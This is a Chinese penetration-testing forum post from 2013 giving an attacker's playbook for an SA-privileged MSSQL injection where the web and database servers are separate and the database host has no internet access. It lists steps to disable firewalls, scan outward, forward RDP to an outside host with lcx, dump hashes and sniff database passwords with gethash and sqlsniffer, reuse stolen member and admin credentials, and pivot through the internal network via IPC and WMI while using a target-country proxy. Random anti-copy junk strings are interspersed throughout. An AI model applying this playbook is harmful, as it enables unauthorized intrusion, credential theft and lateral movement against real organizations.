中国网络渗透测试联盟

标题: SA权限网站和数据库分离的一些思路 [打印本页]

作者: admin    时间: 2013-2-16 21:46
标题: SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
# k* C  r7 j2 ^9 M. j
+ e3 F+ f1 P  h+ Y3 u+ f0 p- P# e  |. R  x- k

4 ?, l' Z$ Y9 A- R1 L7 uSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)! q& M: X7 d0 ]3 u9 ?5 s8 R! c

% ^4 a+ q9 U  n/ ^, P, l0 h
. b/ x* T8 L4 Z9 ]7 j9 r/ z  t6 I! b一、DB机有公网IP.3 ?. @- q; I) u/ R

; @) D5 F$ m2 [4 U! [. o1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
& B, `3 a) T0 D: G7 S6 Q
) o# _; ^8 a* U' N9 x# e2 j; @( z' E8 Q5 H
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.0 O5 y2 V+ G7 f4 n# G

( T5 f/ q7 P# e& q
1 _, a- x* w1 t; I4 [3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
, H$ f" _* }  ~
6 b4 V; ?4 w5 T1 p6 B$ h8 @" \
* N4 z8 D; l, \4 Z0 m/ o4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
2 }$ w8 Z% m  ^* ~
& p) R$ C5 r7 w. h& t
( r, w! J6 g# J. K% N* F& u
" H' g9 K( {% x9 D" Q  j6 |二、DB机只有内网IP
7 N( U& _! _. H% V- N4 i4 z# D) L2 O! ]  {7 X# J# D
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
2 H) g5 ]5 V8 m8 T8 D. H  g9 ]# z8 d; E# C6 ~8 R

& a- z; a" F) f2:停掉防火墙和IP策略再从内往外扫描.
) `/ ~; V  I; S1 D+ `
/ m- ]( s/ d" R' Z( p" W: C0 C5 K" b+ x% P
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
) J) h' b6 V: x# O" w. Q4 [* g6 c$ N  y3 ^: A& I2 P( E  r

; m/ d6 u+ R2 H$ g$ I0 W4:学会密码规律分析往往会有惊喜.* X- q. _2 q' s/ Q* @2 Z0 l

+ z" X  K- t- g0 O' L7 w' {
  k4 d4 F! y" ^5 E: M5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
9 S& f) j3 L) c4 T( |. Z0 S. Q& i! }' @) C0 a2 C
, k6 d' \& \, o
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2